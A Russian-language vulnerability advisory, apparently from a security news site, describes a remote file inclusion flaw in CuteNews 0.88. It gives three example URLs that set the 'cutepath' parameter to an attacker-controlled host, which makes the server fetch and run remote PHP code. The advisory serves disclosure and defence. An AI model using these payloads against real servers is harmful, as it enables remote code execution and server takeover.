Security Lab

Выполнение произвольных команд в CuteNews

Дата публикации:03.03.2003
Дата изменения:17.10.2006
Всего просмотров:4354
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: CuteNews 0.x
Описание: Уязвимость включения файла обнаружена в CuteNews. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системе на целевом сервере.

Сообщается, что несколько сценариев включают файлы, не подтверждая правильность местоположения включенного файла. Удаленный пользователь может создать URL, который определяет удаленное местоположение для 'config.php' и 'news.txt' файлов, чтобы заставить сервер выполнить дистанционно расположенный PHP файл. Уязвимы сценарии 'shownews.php', 'search.php', и 'comments.php':

http://[VICTIM]/cutenews/shownews.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/search.php?cutepath=http://[ATTAC KER]/
http://[VICTIM]/cutenews/comments.php?cutepath=http://[ATTACKER]/
где
http://[ATTACKER]/config.php или http://[ATTACKER]/news.txt
Любые команды будут выполнены с привилегиями Web сервера.

Уязвимость обнаружена в CuteNews 0.88

Ссылки: PHP code injection in CuteNews